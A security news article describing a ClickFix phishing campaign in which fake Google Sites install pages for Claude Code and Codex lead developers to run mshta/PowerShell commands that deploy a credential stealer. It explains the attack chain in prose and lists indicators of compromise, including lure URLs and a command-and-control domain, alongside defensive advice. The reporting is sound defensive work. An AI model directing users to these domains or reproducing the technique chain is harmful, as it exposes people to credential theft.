Fake Claude Code and Codex Install Pages on Google Sites Push Credential-Stealing Malware
7 min. read 
Published on
A new ClickFix-style phishing campaign is impersonating Claude Code and OpenAI Codex to trick developers into running malicious setup instructions. The attack uses Google Sites pages that look like legitimate installation guides, then pushes victims into launching a Windows command that starts a credential-stealing malware chain.
ANY.RUN flagged one Claude-themed lure as malicious in its sandbox analysis, with the page hosted at sites.google.com/view/clau-ver-un-24 and tagged as ClickFix phishing. The campaign targets users who already expect AI coding tools to involve terminal-based setup steps.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
The risk is serious because the malware does not rely on a normal downloaded installer. Instead, the victim follows what appears to be a setup instruction, and the attack chain moves into script-based execution that can steal browser data, email credentials, cryptocurrency wallet data, and other sensitive information.
How The Fake Claude Code Installer Attack Works
The campaign uses trusted-looking Google Sites pages to mimic installation pages for developer tools. This makes the lure more convincing because the visible hosting domain belongs to Google, even though the content on the page does not come from Anthropic or OpenAI.
From there, victims are instructed to run a command through Windows utilities. The public ANY.RUN campaign post says the chain uses a user-executed mshta step, multi-stage PowerShell delivery, steganographic payload extraction from an image, in-memory shellcode execution, and exfiltration to attacker-controlled infrastructure.
This approach works because developers often copy terminal commands from documentation. Attackers abuse that habit by making the page look like a routine installation guide instead of a malware delivery page.
Key Details At A Glance
| Campaign type | ClickFix social engineering attack |
| Main lure | Fake Claude Code and OpenAI Codex installation pages |
| Hosting abuse | Google Sites pages used to increase trust |
| Initial execution method | User is told to run a Windows command |
| Notable tools abused | mshta.exe and powershell.exe |
| Payload behavior | In-memory stealer execution using staged scripts |
| Data at risk | Browser credentials, email data, and cryptocurrency wallet information |
Why AI Coding Tools Make The Lure More Believable
Claude Code and Codex are both real developer tools, and both can be used from a terminal. That gives attackers a believable cover story when they ask users to paste commands into Windows or another command-line interface.
Anthropic’s Claude Code quickstart explains that Claude Code works through a terminal and supports several installation methods. OpenAI’s Codex CLI documentation similarly describes Codex as a local terminal-based coding agent that can read, edit, and run code in a selected directory.
That normal developer workflow creates a security gap. A user may trust a command because it resembles real documentation, even when the page itself comes from an unrelated domain or a sponsored search result.
ClickFix Attacks Turn User Trust Into Execution
ClickFix attacks rely on social engineering rather than a traditional software exploit. The attacker convinces the victim to copy and run a command that appears to fix a problem, verify access, or complete an installation.
Trend Micro described a related InstallFix campaign involving fake Claude AI installer pages, Google Ads promotion, malicious PowerShell instructions, mshta.exe abuse, obfuscated scripts, and fileless payload delivery.
The method is effective because the victim performs the most important step for the attacker. Security prompts, browser warnings, and file download checks may not appear if the attack uses built-in Windows tools and in-memory execution.
Steganography And In-Memory Execution Reduce Visibility
ANY.RUN’s public analysis says the campaign hides part of the payload inside an image and extracts it only during execution. This technique, known as steganography, can reduce obvious file artifacts and make detection harder for teams that rely mainly on static file scanning.
The ANY.RUN report also shows the Google Sites lure receiving a malicious verdict and ClickFix-related detection. That confirms the campaign uses social engineering first, then script-based execution paths after user action.
Because the activity can run through powershell.exe, some network and endpoint tools may treat parts of the traffic as normal administrative behavior. Defenders need behavioral rules that detect suspicious process chains, not just known malware files.
Why Developers Face Higher Risk
Developers, security researchers, and AI power users frequently install command-line tools. They also work with API keys, Git credentials, package registry tokens, cloud access tokens, SSH keys, and cryptocurrency wallets.
That makes developer machines high-value targets. A single infected workstation can expose personal accounts, work credentials, source code access, cloud environments, and private project data.
The fake pages also benefit from timing. Claude Code, Codex, and similar AI coding agents have become common enough that many users search for installation instructions, compare guides, and follow steps quickly without checking every source.
Indicators And Infrastructure Reported Publicly
| Type | Indicator | Description |
| URL | sites.google.com/view/clau-ver-un-24 | Claude-themed Google Sites lure |
| URL | sites.google.com/view/cdx-biz-ver-24 | Codex-themed Google Sites lure reported by ANY.RUN |
| Domain | fairpoint29[.]com | Claude embedded lure domain reported by ANY.RUN |
| Domain | fluxforge97[.]com | Claude embedded lure domain reported by ANY.RUN |
| Domain | freshbase11[.]com | Codex embedded lure domain reported by ANY.RUN |
| Domain | wiseview58[.]com | Codex embedded lure domain reported by ANY.RUN |
| C2 | enhanceblabber[.]cc | Command-and-control domain reported by ANY.RUN |
| Process | mshta.exe | Windows utility abused in the initial execution chain |
| Process | powershell.exe | Used for staged delivery and in-memory activity |
Security teams should treat these indicators as a starting point, not a complete detection strategy. Attackers can rotate domains quickly, especially when they rely on social engineering and trusted hosting platforms.
How To Install Claude Code And Codex Safely
Users should only follow installation steps from official documentation or verified repositories. For Claude Code, users should start with the official Anthropic quickstart guide. For Codex, users should use the official OpenAI Codex CLI page or the linked OpenAI GitHub repository.
Search ads, copied snippets, forum posts, and unofficial setup pages should not be trusted by default. This matters even more when a page asks the user to paste a command into PowerShell, Terminal, or Command Prompt.
- Open official documentation manually instead of clicking sponsored results.
- Check the real browser address bar before running any install step.
- Do not run commands from Google Sites, paste pages, forums, or random blogs.
- Use a test VM or sandbox before evaluating unfamiliar developer tools.
- Keep endpoint protection enabled during installations.
- Rotate exposed API keys and tokens after any suspicious command execution.
- Review shell history for unknown install commands.
What Organizations Should Monitor
Companies should look for suspicious parent-child process relationships involving browsers, mshta.exe, powershell.exe, script hosts, and network connections to newly registered or low-reputation domains.
The ANY.RUN IoC post lists multiple lure and infrastructure domains, while Trend Micro’s Claude Code InstallFix research shows how similar campaigns use fileless delivery, evasion, and attacker-controlled command-and-control servers.
Defenders should also create policies around command-line installs for developer tools. Blocking every script may disrupt engineering teams, but unmanaged copy-paste installation from unknown pages creates unnecessary risk.
FAQ
It is a ClickFix-style malware campaign that impersonates Claude Code and OpenAI Codex installation pages. Victims are directed to fake setup pages and told to run commands that start a credential-stealing malware chain.
Google Sites gives the lure a trusted-looking hosting domain. Attackers abuse that trust to make a fake installation page look safer than a random domain would.
The campaign targets sensitive data such as saved browser credentials, email data, cryptocurrency wallet information, and other valuable account or device data available on the victim’s machine.
Users should open official Anthropic or OpenAI documentation directly, avoid sponsored or unfamiliar setup pages, and never paste terminal commands from pages they have not verified.
They should disconnect the device from the network, preserve evidence, scan the system, rotate passwords and API keys from a clean device, review account activity, and ask their security team to check for suspicious PowerShell or mshta activity.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages